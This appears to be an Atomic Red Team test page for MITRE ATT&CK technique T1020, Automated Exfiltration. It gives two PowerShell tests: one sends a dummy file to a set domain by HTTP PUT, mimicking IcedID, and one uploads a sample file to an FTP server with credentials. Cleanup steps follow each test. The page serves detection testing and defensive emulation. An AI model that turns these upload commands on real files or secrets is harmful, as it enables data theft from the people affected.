Atomic Red Team doc generator
106 lines
2.9 KiB
Markdown
106 lines
2.9 KiB
Markdown
# T1020 - Automated Exfiltration
|
|
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
|
|
<blockquote>
|
|
|
|
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
|
|
|
|
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).
|
|
|
|
</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
|
|
|
|
- [Atomic Test #2 - Exfiltration via Encrypted FTP](#atomic-test-2---exfiltration-via-encrypted-ftp)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - IcedID Botnet HTTP PUT
|
|
Creates a text file
|
|
Tries to upload to a server via HTTP PUT method with ContentType Header
|
|
Deletes a created file
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| file | Exfiltration File | string | C:\temp\T1020_exfilFile.txt|
|
|
| domain | Destination Domain | url | https://google.com|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
$fileName = "#{file}"
|
|
$url = "#{domain}"
|
|
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
|
|
$contentType = "application/octet-stream"
|
|
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
|
|
```
|
|
|
|
#### Cleanup Commands:
|
|
```powershell
|
|
$fileName = "#{file}"
|
|
Remove-Item -Path $fileName -ErrorAction Ignore
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Exfiltration via Encrypted FTP
|
|
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| sampleFile | Path of the sample file to exfiltrate. | String | C:\temp\T1020__FTP_sample.txt|
|
|
| ftpServer | FTP server URL. | Url | ftp://example.com|
|
|
| credentials | FTP server credentials. | String | [user:password]|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
$sampleData = "Sample data for exfiltration test"
|
|
Set-Content -Path "#{sampleFile}" -Value $sampleData
|
|
$ftpUrl = "#{ftpServer}"
|
|
$creds = Get-Credential -Credential "#{credentials}"
|
|
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
|
|
```
|
|
|
|
#### Cleanup Commands:
|
|
```powershell
|
|
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|